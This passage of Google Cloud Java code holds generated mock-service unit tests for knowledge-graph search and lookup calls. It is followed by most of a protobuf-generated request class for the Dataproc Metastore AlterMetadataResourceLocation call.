    mockService.addException(exception);

    try {
      LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]");
      String query = "query107944136";
      client.search(parent, query);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: search via the String-parent overload.
  @Test
  public void searchTest2() throws Exception {
    SearchResponse expectedResponse =
        SearchResponse.newBuilder()
            .setContext(Value.newBuilder().setBoolValue(true).build())
            .setType(Value.newBuilder().setBoolValue(true).build())
            .setItemListElement(ListValue.newBuilder().build())
            .build();
    mockService.addResponse(expectedResponse);

    String parent = "projects/project-5833/locations/location-5833";
    String query = "query107944136";

    SearchResponse actualResponse = client.search(parent, query);
    Assert.assertEquals(expectedResponse, actualResponse);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for search(String, query).
  @Test
  public void searchExceptionTest2() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      String parent = "projects/project-5833/locations/location-5833";
      String query = "query107944136";
      client.search(parent, query);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: lookupPublicKg(LocationName, ids) round-trips the mocked response.
  @Test
  public void lookupPublicKgTest() throws Exception {
    LookupPublicKgResponse expectedResponse =
        LookupPublicKgResponse.newBuilder()
            .setContext(Value.newBuilder().setBoolValue(true).build())
            .setType(Value.newBuilder().setBoolValue(true).build())
            .setItemListElement(ListValue.newBuilder().build())
            .build();
    mockService.addResponse(expectedResponse);

    LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]");
    List<String> ids = new ArrayList<>();

    LookupPublicKgResponse actualResponse = client.lookupPublicKg(parent, ids);
    Assert.assertEquals(expectedResponse, actualResponse);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for lookupPublicKg(LocationName, ids).
  @Test
  public void lookupPublicKgExceptionTest() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]");
      List<String> ids = new ArrayList<>();
      client.lookupPublicKg(parent, ids);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: lookupPublicKg via the String-parent overload.
  @Test
  public void lookupPublicKgTest2() throws Exception {
    LookupPublicKgResponse expectedResponse =
        LookupPublicKgResponse.newBuilder()
            .setContext(Value.newBuilder().setBoolValue(true).build())
            .setType(Value.newBuilder().setBoolValue(true).build())
            .setItemListElement(ListValue.newBuilder().build())
            .build();
    mockService.addResponse(expectedResponse);

    String parent = "projects/project-5833/locations/location-5833";
    List<String> ids = new ArrayList<>();

    LookupPublicKgResponse actualResponse = client.lookupPublicKg(parent, ids);
    Assert.assertEquals(expectedResponse, actualResponse);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for lookupPublicKg(String, ids).
  @Test
  public void lookupPublicKgExceptionTest2() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      String parent = "projects/project-5833/locations/location-5833";
      List<String> ids = new ArrayList<>();
      client.lookupPublicKg(parent, ids);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
    }
  }

  // Happy path: searchPublicKg(LocationName, query) round-trips the mocked response.
  @Test
  public void searchPublicKgTest() throws Exception {
    SearchPublicKgResponse expectedResponse =
        SearchPublicKgResponse.newBuilder()
            .setContext(Value.newBuilder().setBoolValue(true).build())
            .setType(Value.newBuilder().setBoolValue(true).build())
            .setItemListElement(ListValue.newBuilder().build())
            .build();
    mockService.addResponse(expectedResponse);

    LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]");
    String query = "query107944136";

    SearchPublicKgResponse actualResponse = client.searchPublicKg(parent, query);
    Assert.assertEquals(expectedResponse, actualResponse);

    List<String> actualRequests = mockService.getRequestPaths();
    Assert.assertEquals(1, actualRequests.size());

    String apiClientHeaderKey =
        mockService
            .getRequestHeaders()
            .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey())
            .iterator()
            .next();
    Assert.assertTrue(
        GaxHttpJsonProperties.getDefaultApiClientHeaderPattern()
            .matcher(apiClientHeaderKey)
            .matches());
  }

  // INVALID_ARGUMENT propagation for searchPublicKg(LocationName, query).
  // (This excerpt ends mid-method; the file continues beyond this point.)
  @Test
  public void searchPublicKgExceptionTest() throws Exception {
    ApiException exception =
        ApiExceptionFactory.createException(
            new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false);
    mockService.addException(exception);

    try {
      LocationName parent = LocationName.of("[PROJECT]", "[LOCATION]");
      String query = "query107944136";
      client.searchPublicKg(parent, query);
      Assert.fail("No exception raised");
    } catch (InvalidArgumentException e) {
      // Expected exception.
} } @Test public void searchPublicKgTest2() throws Exception { SearchPublicKgResponse expectedResponse = SearchPublicKgResponse.newBuilder() .setContext(Value.newBuilder().setBoolValue(true).build()) .setType(Value.newBuilder().setBoolValue(true).build()) .setItemListElement(ListValue.newBuilder().build()) .build(); mockService.addResponse(expectedResponse); String parent = "projects/project-5833/locations/location-5833"; String query = "query107944136"; SearchPublicKgResponse actualResponse = client.searchPublicKg(parent, query); Assert.assertEquals(expectedResponse, actualResponse); List<String> actualRequests = mockService.getRequestPaths(); Assert.assertEquals(1, actualRequests.size()); String apiClientHeaderKey = mockService .getRequestHeaders() .get(ApiClientHeaderProvider.getDefaultApiClientHeaderKey()) .iterator() .next(); Assert.assertTrue( GaxHttpJsonProperties.getDefaultApiClientHeaderPattern() .matcher(apiClientHeaderKey) .matches()); } @Test public void searchPublicKgExceptionTest2() throws Exception { ApiException exception = ApiExceptionFactory.createException( new Exception(), FakeStatusCode.of(StatusCode.Code.INVALID_ARGUMENT), false); mockService.addException(exception); try { String parent = "projects/project-5833/locations/location-5833"; String query = "query107944136"; client.searchPublicKg(parent, query); Assert.fail("No exception raised"); } catch (InvalidArgumentException e) { // Expected exception. } } }
googleapis/google-cloud-java
35,736
java-dataproc-metastore/proto-google-cloud-dataproc-metastore-v1/src/main/java/com/google/cloud/metastore/v1/AlterMetadataResourceLocationRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/metastore/v1/metastore.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.metastore.v1; /** * * * <pre> * Request message for * [DataprocMetastore.AlterMetadataResourceLocation][google.cloud.metastore.v1.DataprocMetastore.AlterMetadataResourceLocation]. * </pre> * * Protobuf type {@code google.cloud.metastore.v1.AlterMetadataResourceLocationRequest} */ public final class AlterMetadataResourceLocationRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) AlterMetadataResourceLocationRequestOrBuilder { private static final long serialVersionUID = 0L; // Use AlterMetadataResourceLocationRequest.newBuilder() to construct. 
private AlterMetadataResourceLocationRequest( com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private AlterMetadataResourceLocationRequest() { service_ = ""; resourceName_ = ""; locationUri_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new AlterMetadataResourceLocationRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.metastore.v1.MetastoreProto .internal_static_google_cloud_metastore_v1_AlterMetadataResourceLocationRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.metastore.v1.MetastoreProto .internal_static_google_cloud_metastore_v1_AlterMetadataResourceLocationRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest.class, com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest.Builder.class); } public static final int SERVICE_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object service_ = ""; /** * * * <pre> * Required. The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The service. */ @java.lang.Override public java.lang.String getService() { java.lang.Object ref = service_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); service_ = s; return s; } } /** * * * <pre> * Required. 
The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for service. */ @java.lang.Override public com.google.protobuf.ByteString getServiceBytes() { java.lang.Object ref = service_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); service_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int RESOURCE_NAME_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object resourceName_ = ""; /** * * * <pre> * Required. The relative metadata resource name in the following format. * * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The resourceName. */ @java.lang.Override public java.lang.String getResourceName() { java.lang.Object ref = resourceName_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); resourceName_ = s; return s; } } /** * * * <pre> * Required. The relative metadata resource name in the following format. * * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The bytes for resourceName. 
*/ @java.lang.Override public com.google.protobuf.ByteString getResourceNameBytes() { java.lang.Object ref = resourceName_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); resourceName_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int LOCATION_URI_FIELD_NUMBER = 3; @SuppressWarnings("serial") private volatile java.lang.Object locationUri_ = ""; /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The locationUri. */ @java.lang.Override public java.lang.String getLocationUri() { java.lang.Object ref = locationUri_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); locationUri_ = s; return s; } } /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The bytes for locationUri. 
*/ @java.lang.Override public com.google.protobuf.ByteString getLocationUriBytes() { java.lang.Object ref = locationUri_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); locationUri_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(service_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, service_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(resourceName_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, resourceName_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(locationUri_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 3, locationUri_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(service_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, service_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(resourceName_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, resourceName_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(locationUri_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, locationUri_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; 
} if (!(obj instanceof com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest)) { return super.equals(obj); } com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest other = (com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) obj; if (!getService().equals(other.getService())) return false; if (!getResourceName().equals(other.getResourceName())) return false; if (!getLocationUri().equals(other.getLocationUri())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + SERVICE_FIELD_NUMBER; hash = (53 * hash) + getService().hashCode(); hash = (37 * hash) + RESOURCE_NAME_FIELD_NUMBER; hash = (53 * hash) + getResourceName().hashCode(); hash = (37 * hash) + LOCATION_URI_FIELD_NUMBER; hash = (53 * hash) + getLocationUri().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite 
extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static 
com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request message for * [DataprocMetastore.AlterMetadataResourceLocation][google.cloud.metastore.v1.DataprocMetastore.AlterMetadataResourceLocation]. 
* </pre> * * Protobuf type {@code google.cloud.metastore.v1.AlterMetadataResourceLocationRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.metastore.v1.MetastoreProto .internal_static_google_cloud_metastore_v1_AlterMetadataResourceLocationRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.metastore.v1.MetastoreProto .internal_static_google_cloud_metastore_v1_AlterMetadataResourceLocationRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest.class, com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest.Builder.class); } // Construct using // com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; service_ = ""; resourceName_ = ""; locationUri_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.metastore.v1.MetastoreProto .internal_static_google_cloud_metastore_v1_AlterMetadataResourceLocationRequest_descriptor; } @java.lang.Override public com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest getDefaultInstanceForType() { return com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest .getDefaultInstance(); } @java.lang.Override public 
com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest build() { com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest buildPartial() { com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest result = new com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.service_ = service_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.resourceName_ = resourceName_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.locationUri_ = locationUri_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof 
com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) { return mergeFrom( (com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest other) { if (other == com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest .getDefaultInstance()) return this; if (!other.getService().isEmpty()) { service_ = other.service_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getResourceName().isEmpty()) { resourceName_ = other.resourceName_; bitField0_ |= 0x00000002; onChanged(); } if (!other.getLocationUri().isEmpty()) { locationUri_ = other.locationUri_; bitField0_ |= 0x00000004; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { service_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { resourceName_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 26: { locationUri_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000004; break; } // case 26 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object service_ = ""; /** * * * 
<pre> * Required. The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The service. */ public java.lang.String getService() { java.lang.Object ref = service_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); service_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for service. */ public com.google.protobuf.ByteString getServiceBytes() { java.lang.Object ref = service_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); service_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The service to set. * @return This builder for chaining. */ public Builder setService(java.lang.String value) { if (value == null) { throw new NullPointerException(); } service_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. 
The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearService() { service_ = getDefaultInstance().getService(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Required. The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The bytes for service to set. * @return This builder for chaining. */ public Builder setServiceBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); service_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object resourceName_ = ""; /** * * * <pre> * Required. The relative metadata resource name in the following format. * * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The resourceName. */ public java.lang.String getResourceName() { java.lang.Object ref = resourceName_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); resourceName_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. The relative metadata resource name in the following format. 
* * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The bytes for resourceName. */ public com.google.protobuf.ByteString getResourceNameBytes() { java.lang.Object ref = resourceName_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); resourceName_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. The relative metadata resource name in the following format. * * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The resourceName to set. * @return This builder for chaining. */ public Builder setResourceName(java.lang.String value) { if (value == null) { throw new NullPointerException(); } resourceName_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. The relative metadata resource name in the following format. * * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return This builder for chaining. */ public Builder clearResourceName() { resourceName_ = getDefaultInstance().getResourceName(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * Required. The relative metadata resource name in the following format. 
* * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The bytes for resourceName to set. * @return This builder for chaining. */ public Builder setResourceNameBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); resourceName_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private java.lang.Object locationUri_ = ""; /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The locationUri. */ public java.lang.String getLocationUri() { java.lang.Object ref = locationUri_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); locationUri_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The bytes for locationUri. */ public com.google.protobuf.ByteString getLocationUriBytes() { java.lang.Object ref = locationUri_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); locationUri_ = b; return b; } else { return 